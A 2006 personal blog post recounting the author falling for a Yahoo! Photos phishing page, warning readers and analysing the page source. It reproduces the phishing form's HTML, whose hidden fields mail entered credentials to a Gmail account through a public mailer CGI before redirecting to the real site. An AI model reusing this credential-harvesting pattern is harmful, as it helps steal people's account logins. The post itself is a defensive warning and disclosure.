Thursday, August 17, 2006

Thiefs Stealing Yahoo! Accounts

This is a warning and a story in the same time...


The story... Yesterday I received a link via Yahoo! Messenger from a friend. So I clicked it. It supposed to be a funny picture and since I love to see funny things I went along. The site that opened looked exactly like Yahoo! Photos log-in page. A little bit strange, but it was hosted on Geocities which is an Yahoo! member. So I typed in the user name and password... Next I see again the log-in page with my user name read-only, this time the page was the legitimate Yahoo! Photos log-in page. That moment was just like a striking bold to me... So I went back to that page and viewed the source. Surprise! The page was mailing those credentials to a GMail account! Imagine my frustration in that moment as I should seen that before I entered the password! So the next move was to change the password for the account. Luckily it worked and I managed to keep the account. So the next move was to send a warning to Google, Yahoo! and F-Secure (see below why) and I sent a note in Romanian and English to all my Yahoo! contacts.


The warning... Please, pretty please... be very careful where you type in the credentials to your accounts, banks etc. and make sure that you actually use the right sites. Never ever follow links in e-mails that ask for bank credentials and be suspicious about the ones that want your site credentials.


The analysis of the page... Now I get technically. I used view source and looked at the <form> tag, here is the content of it:


<FORM METHOD="POST" ACTION="http://<a site address goes here>/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">

<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">

<INPUT TYPE="hidden" NAME="Mail_To" VALUE="<a mail account>@gmail.com">

<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

<INPUT TYPE="hidden" NAME="Next_Page" value="http://photos.yahoo.com/ph//my_photos">

Look at it! The action for the page is a mailer CGI... that means that it actually mails the password to someone! Next you can see that it mails it to a GMail account with the subject "Yahoo id" and the mailer redirects you to Yahoo! Photos.


Looking at the hidden fields there you can see that the mailer is a public accessible one and not a custom made one. And since I could see what GMail account was used to receive it, I notified it to Google. The page is hosted on Yahoo! Geocities, so I notified Yahoo! to0. And since I am a "fan" of F-Secure products I also dropped them a note too.


So I really hope that the site from Geocities will be shut down as well as the mail account on Google too. Hopefully the owners of the abused accounts will perform criminal investigations and the thief will be caught and brought to justice... Am I too harsh with her/him? You judge and tell me...

No comments: